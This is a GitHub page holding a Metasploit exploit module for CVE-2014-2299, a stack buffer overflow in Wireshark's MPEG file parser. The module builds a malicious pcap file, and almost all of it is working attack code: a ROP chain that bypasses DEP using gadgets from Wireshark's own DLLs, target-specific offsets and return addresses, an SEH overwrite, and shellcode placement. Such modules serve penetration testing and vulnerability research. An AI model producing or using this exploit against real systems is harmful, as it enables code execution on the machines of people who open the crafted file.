-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathcve-2014-2299
138 lines (120 loc) · 4.96 KB
/
cve-2014-2299
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
#
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow',
'Description' => %q{
This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5
by generating an malicious file.)
},
'License' => MSF_LICENSE,
'Author' =>
[
'Wesley Neelen', # Discovery vulnerability
'j0sm1', # Exploit and msf module
],
'References' =>
[
[ 'CVE', '2014-2299'],
[ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9843' ],
[ 'URL', 'http://www.wireshark.org/security/wnpa-sec-2014-04.html' ],
[ 'URL', 'http://www.securityfocus.com/bid/66066/info' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'BadChars' => "\xff",
'Space' => 600,
'DisableNops' => 'True',
'PrependEncoder' => "\x81\xec\xc8\x00\x00\x00" # sub esp,200
},
'Platform' => 'win',
'Targets' =>
[
[ 'WinXP SP3 Spanish (bypass DEP)',
{
'OffSet' => 69732,
'OffSet2' => 70476,
'Ret' => 0x1c077cc3, # pop/pop/ret -> "c:\Program Files\Wireshark\krb5_32.dll" (version: 1.6.3.16)
'jmpesp' => 0x68e2bfb9,
}
],
[ 'WinXP SP2/SP3 English (bypass DEP)',
{
'OffSet2' => 70692,
'OffSet' => 70476,
'Ret' => 0x1c077cc3, # pop/pop/ret -> krb5_32.dll module
'jmpesp' => 0x68e2bfb9,
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Mar 20 2014'
))
register_options(
[
OptString.new('FILENAME', [ true, 'pcap file', 'mpeg_overflow.pcap']),
], self.class)
end
def create_rop_chain()
# rop chain generated with mona.py - www.corelan.be
rop_gadgets =
[
0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
0x62d9027c, # ptr to &VirtualProtect() [IAT libcares-2.dll]
0x61970969, # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
0x61988cf6, # XCHG EAX,ESI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
0x619c0a2a, # POP EBP # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
0x61841e98, # & push esp # ret [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
0x6191d11a, # POP EBX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
0x00000201, # 0x00000201-> ebx
0x5a4c1414, # POP EDX # RETN [zlib1.dll, ver: 1.2.5.0]
0x00000040, # 0x00000040-> edx
0x6197660f, # POP ECX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
0x668242b9, # &Writable location [libgnutls-26.dll]
0x6199b8a5, # POP EDI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0
0x63a528c2, # RETN (ROP NOP) [libgobject-2.0-0.dll]
0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
0x90909090, # nop
0x6199652d, # PUSHAD # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
].flatten.pack("V*")
return rop_gadgets
end
def exploit
print_status("Creating '#{datastore['FILENAME']}' file ...")
ropchain = create_rop_chain
magic_header = "\xff\xfb\x41" # mpeg magic_number(MP3) -> http://en.wikipedia.org/wiki/MP3#File_structure
# Here we build the packet data
packet = rand_text_alpha(883)
packet << "\x6c\x7d\x37\x6c" # NOP RETN
packet << "\x6c\x7d\x37\x6c" # NOP RETN
packet << ropchain
packet << payload.encoded # Shellcode
packet << rand_text_alpha(target['OffSet'] - 892 - ropchain.length - payload.encoded.length)
# 0xff is a badchar for this exploit then we can't make a jump back with jmp $-2000
# After nseh and seh we haven't space, then we have to jump to another location.
# When file is open with command line. This is NSEH/SEH overwrite
packet << make_nops(4) # nseh
packet << "\x6c\x2e\xe0\x68" # ADD ESP,93C # MOV EAX,EBX # POP EBX # POP ESI # POP EDI # POP EBP # RETN
packet << rand_text_alpha(target['OffSet2'] - target['OffSet'] - 8) # junk
# When file is open with GUI interface. This is NSEH/SEH overwrite
packet << make_nops(4) # nseh
# seh -> # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] **
packet << "\x55\x59\x80\x6b"
print_status("Preparing payload")
filecontent = magic_header
filecontent << packet
print_status("Writing payload to file, " + filecontent.length.to_s()+" bytes")
file_create(filecontent)
end
end